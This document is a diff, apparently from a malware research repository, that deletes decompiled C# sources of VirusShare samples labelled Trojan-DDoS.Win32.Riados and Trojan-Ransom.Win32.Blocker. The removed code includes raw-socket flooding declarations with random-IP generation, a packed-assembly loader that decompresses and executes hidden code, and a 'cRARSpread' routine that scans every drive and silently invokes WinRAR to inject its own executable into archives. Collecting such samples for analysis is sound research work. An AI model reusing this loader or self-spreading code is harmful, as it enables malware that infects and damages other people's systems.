[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe uint resolution_de_nom([In] bool obj0, [In] sbyte* obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern ushort htons([In] ushort obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern uint GetTickCount();
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern void srand([In] uint obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe sbyte* dimensionnement_de_data_a_envoyer(
[In] bool obj0,
[In] sbyte* obj1,
[In] uint obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe double strtod([In] sbyte* obj0, [In] sbyte** obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern int rand();
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern uint generation_d_une_adresse_ip_aleatoire([In] int obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern int WSACleanup();
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern int closesocket([In] uint obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int sendto(
[In] uint obj0,
[In] sbyte* obj1,
[In] int obj2,
[In] int obj3,
[In] sockaddr* obj4,
[In] int obj5);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe void* memcpy([In] void* obj0, [In] void* obj1, [In] uint obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe ushort calcul_du_checksum_tcp(
[In] bool obj0,
[In] uint obj1,
[In] uint obj2,
[In] tcp obj3,
[In] sbyte* obj4);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int setsockopt(
[In] uint obj0,
[In] int obj1,
[In] int obj2,
[In] sbyte* obj3,
[In] int obj4);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern uint socket([In] int obj0, [In] int obj1, [In] int obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int WSAStartup([In] ushort obj0, [In] WSAData* obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern int WSAGetLastError();
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe sbyte* inet_ntoa([In] in_addr obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern uint _mainCRTStartup();
}

15
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/_SECURITY_ATTRIBUTES.cs
View File

@ -1,15 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: _SECURITY_ATTRIBUTES
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[MiscellaneousBits(1)]
[DebugInfoInPDB]
[StructLayout(LayoutKind.Sequential, Size = 12, Pack = 1)]
internal struct _SECURITY_ATTRIBUTES
{
}

15
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/in_addr.cs
View File

@ -1,15 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: in_addr
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[MiscellaneousBits(1)]
[DebugInfoInPDB]
[StructLayout(LayoutKind.Sequential, Size = 4, Pack = 1)]
internal struct in_addr
{
}

15
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/ipv4.cs
View File

@ -1,15 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: ipv4
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[MiscellaneousBits(1)]
[StructLayout(LayoutKind.Sequential, Size = 20, Pack = 1)]
internal struct ipv4
{
}

15
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/sockaddr.cs
View File

@ -1,15 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: sockaddr
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[MiscellaneousBits(1)]
[DebugInfoInPDB]
[StructLayout(LayoutKind.Sequential, Size = 16, Pack = 1)]
internal struct sockaddr
{
}

15
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/sockaddr_in.cs
View File

@ -1,15 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: sockaddr_in
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[MiscellaneousBits(1)]
[StructLayout(LayoutKind.Sequential, Size = 16, Pack = 1)]
internal struct sockaddr_in
{
}

15
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/tcp.cs
View File

@ -1,15 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: tcp
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[MiscellaneousBits(1)]
[StructLayout(LayoutKind.Sequential, Size = 20, Pack = 1)]
internal struct tcp
{
}

15
MSIL/Trojan-DDoS/Win32/R/Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d/tm.cs
View File

@ -1,15 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: tm
// Assembly: ARF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 13D218E6-2AC6-45F1-825B-2D9D856DE7F9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-DDoS.Win32.Riados.a-a0eee3157c5cf4647c24eea1210e03f95cd89369de6fd831f5ed41c889913a7d.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[MiscellaneousBits(1)]
[StructLayout(LayoutKind.Sequential, Size = 36, Pack = 1)]
internal struct tm
{
}

15
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036/AssemblyInfo.cs
View File

@ -1,15 +0,0 @@
using System.Reflection;
using System.Security.Permissions;
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyVersion("1.0.2132.1881")]
[assembly: PermissionSet(SecurityAction.RequestMinimum, XML = "<PermissionSet class=\"System.Security.PermissionSet\"\r\n version=\"1\">\r\n <IPermission class=\"System.Security.Permissions.SecurityPermission, mscorlib, Version=1.0.5000.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\r\n version=\"1\"\r\n Flags=\"SkipVerification\"/>\r\n</PermissionSet>\r\n")]

42
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036/Trojan-Ransom.Win32.Blocker.fsys.csproj
View File

@ -1,42 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>nsnet</AssemblyName>
<ApplicationVersion>1.0.2132.1881</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualC" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E.cs" />
<Compile Include="_CRangeDecoder.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

20
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036/Trojan-Ransom.Win32.Blocker.fsys.sln
View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "nsnet", "Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036.csproj", "{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}.Debug|Any CPU.Build.0 = Debug|Any CPU
{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}.Release|Any CPU.ActiveCfg = Release|Any CPU
{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

118
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036/_003CModule_003E.cs
View File

@ -1,118 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: nsnet, Version=1.0.2132.1881, Culture=neutral, PublicKeyToken=null
// MVID: E55443D8-38A6-48C9-BD12-6F2C033A02DB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036.exe
using System;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security;
internal class \u003CModule\u003E
{
public static __FnPtr<int (uint, uint, uint)> LzmaVirtualFree;
public static __FnPtr<uint (uint, uint, uint, uint)> LzmaVirtualAlloc;
public static unsafe int main()
{
byte[] rawAssembly = new byte[(int) \u003CModule\u003E.GetoriginalSize()];
rawAssembly.Initialize();
fixed (byte* numPtr = &rawAssembly[0])
{
if (\u003CModule\u003E.GetoriginalData(numPtr) != 0)
{
Assembly assembly = Assembly.Load(rawAssembly);
int count1 = assembly.EntryPoint.GetParameters().Count;
object[] parameters = new object[count1];
if (count1 != 0)
{
string[] commandLineArgs = Environment.GetCommandLineArgs();
int count2 = Environment.GetCommandLineArgs().Count;
string[] strArray = new string[count2 - 1];
int index = 1;
if (1 < count2)
{
do
{
strArray[index - 1] = commandLineArgs[index];
++index;
}
while (index < count2);
}
parameters[0] = (object) strArray;
}
// ISSUE: explicit non-virtual call
__nonvirtual (assembly.EntryPoint.Invoke((object) null, parameters));
}
return 0;
}
}
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe void RangeDecoderInit([In] _CRangeDecoder* obj0, [In] byte* obj1, [In] uint obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe uint RangeDecoderDecodeDirectBits([In] _CRangeDecoder* obj0, [In] int obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int RangeDecoderBitDecode([In] ushort* obj0, [In] _CRangeDecoder* obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int RangeDecoderBitTreeDecode(
[In] ushort* obj0,
[In] int obj1,
[In] _CRangeDecoder* obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int RangeDecoderReverseBitTreeDecode(
[In] ushort* obj0,
[In] int obj1,
[In] _CRangeDecoder* obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe byte LzmaLiteralDecodeMatch(
[In] ushort* obj0,
[In] _CRangeDecoder* obj1,
[In] byte obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int LzmaLenDecode([In] ushort* obj0, [In] _CRangeDecoder* obj1, [In] int obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int LzmaDecode(
[In] byte* obj0,
[In] uint obj1,
[In] int obj2,
[In] int obj3,
[In] int obj4,
[In] byte* obj5,
[In] uint obj6,
[In] byte* obj7,
[In] uint obj8);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int LzmaBlockUnPack(
[In] byte* obj0,
[In] byte* obj1,
[In] __FnPtr<uint (uint, uint, uint, uint)> obj2,
[In] __FnPtr<int (uint, uint, uint)> obj3);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern uint GetoriginalSize();
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int GetoriginalData([In] byte* obj0);
}

17
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036/_CRangeDecoder.cs
View File

@ -1,17 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: _CRangeDecoder
// Assembly: nsnet, Version=1.0.2132.1881, Culture=neutral, PublicKeyToken=null
// MVID: E55443D8-38A6-48C9-BD12-6F2C033A02DB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036.exe
using Microsoft.VisualC;
using System;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[CLSCompliant(false)]
[MiscellaneousBits(65)]
[StructLayout(LayoutKind.Sequential, Size = 20, Pack = 1)]
public struct _CRangeDecoder
{
}

7
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/AssemblyInfo.cs
View File

@ -1,7 +0,0 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Security.Permissions;
[assembly: SuppressIldasm]
[assembly: AssemblyVersion("0.0.0.0")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]

BIN
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Sharl
View File

Binary file not shown.

12
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Stub/Token2000022.cs
View File

@ -1,12 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Stub.Token2000022
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
namespace Stub
{
internal class Token2000022 : \u0024Unresolved\u0024Token\u003A1003FFF
{
}
}

91
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Stub/cRARSpread.cs
View File

@ -1,91 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Stub.cRARSpread
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using A;
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
namespace Stub
{
public class cRARSpread
{
private static string ce9ee9bdc267a842d3ef926289d8e02c2;
[DllImport("kernel32.dll", EntryPoint = "GetShortPathName", CharSet = CharSet.Auto)]
private static extern int cf4947a2d3263e417979f2a8d6a63fe5f(
[MarshalAs(UnmanagedType.LPTStr)] string c31bc76e1a9d760d9aeac01c0ca5d54d3,
[MarshalAs(UnmanagedType.LPTStr)] StringBuilder cc505c0b6198cb488994f0dda564f1c32,
int c06afa0370bf8e9e19b50aef2a782433f);
private static void cf93e0385f1c9b9b9fc9168df531885a0(string c23d3141ec47285c032d83ba6aa914036)
{
try
{
foreach (string file in Directory.GetFiles(c23d3141ec47285c032d83ba6aa914036))
{
if (file.Contains(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(322)))
cRARSpread.cc62e4c9f9f6eaec701227263483768c8(file);
if (file.Contains(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(331)))
cRARSpread.cc62e4c9f9f6eaec701227263483768c8(file);
}
foreach (string directory in Directory.GetDirectories(c23d3141ec47285c032d83ba6aa914036))
cRARSpread.cf93e0385f1c9b9b9fc9168df531885a0(directory);
}
catch
{
}
}
public static void RARSpread()
{
try
{
cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2 = Process.GetCurrentProcess().MainModule.FileName;
foreach (string logicalDrive in Environment.GetLogicalDrives())
cRARSpread.cf93e0385f1c9b9b9fc9168df531885a0(logicalDrive);
}
catch
{
}
}
private static void cc62e4c9f9f6eaec701227263483768c8(string c591e77c72aaa11ae89d3e0a04677b964)
{
try
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
string path1 = folderPath.Replace(folderPath.Substring(folderPath.IndexOf(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340))), string.Empty) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340);
string path = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(343);
if (!File.Exists(path))
return;
if (!File.Exists(Path.Combine(path1, cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2)))
File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(path1, cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2));
StringBuilder cc505c0b6198cb488994f0dda564f1c32_1 = new StringBuilder((int) byte.MaxValue);
cRARSpread.cf4947a2d3263e417979f2a8d6a63fe5f(Path.Combine(path1, cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2), cc505c0b6198cb488994f0dda564f1c32_1, cc505c0b6198cb488994f0dda564f1c32_1.Capacity);
StringBuilder cc505c0b6198cb488994f0dda564f1c32_2 = new StringBuilder((int) byte.MaxValue);
cRARSpread.cf4947a2d3263e417979f2a8d6a63fe5f(c591e77c72aaa11ae89d3e0a04677b964, cc505c0b6198cb488994f0dda564f1c32_2, cc505c0b6198cb488994f0dda564f1c32_2.Capacity);
try
{
ProcessStartInfo startInfo = new ProcessStartInfo();
string str = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(380) + cc505c0b6198cb488994f0dda564f1c32_2.ToString() + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(387) + cc505c0b6198cb488994f0dda564f1c32_1.ToString();
startInfo.FileName = path;
startInfo.Arguments = str;
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
Process.Start(startInfo);
}
catch
{
}
}
catch
{
}
}
}
}

12
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Token2000021.cs
View File

@ -1,12 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: A.Token2000021
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
namespace A
{
internal class Token2000021 : \u0024Unresolved\u0024Token\u003A1003FFF
{
}
}

64
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Trojan-Ransom.Win32.Blocker.hejd.csproj
View File

@ -1,64 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{64176F0A-1972-439B-930A-31A081E500B5}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Sharl</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>A</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Management" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E.cs" />
<Compile Include="cb7b65dbb5581eaee2bd1292ca8df7359.cs" />
<Compile Include="c986963ced362383f6d7b6341e31dcfe7.cs" />
<Compile Include="c1f9af90f19d5acdd4845049bcd9444a8.cs" />
<Compile Include="c6c454dac7269c067c2acbc6d3596af91.cs" />
<Compile Include="c25810691943c3772c89bee5b3c190ee0.cs" />
<Compile Include="c57ac7140997a29abffbea04a04f33fc6.cs" />
<Compile Include="ca2a3d5a1b8d431c404c11a5f27d5064a.cs" />
<Compile Include="c723bfb08ed492f620d3f103aea9340c0.cs" />
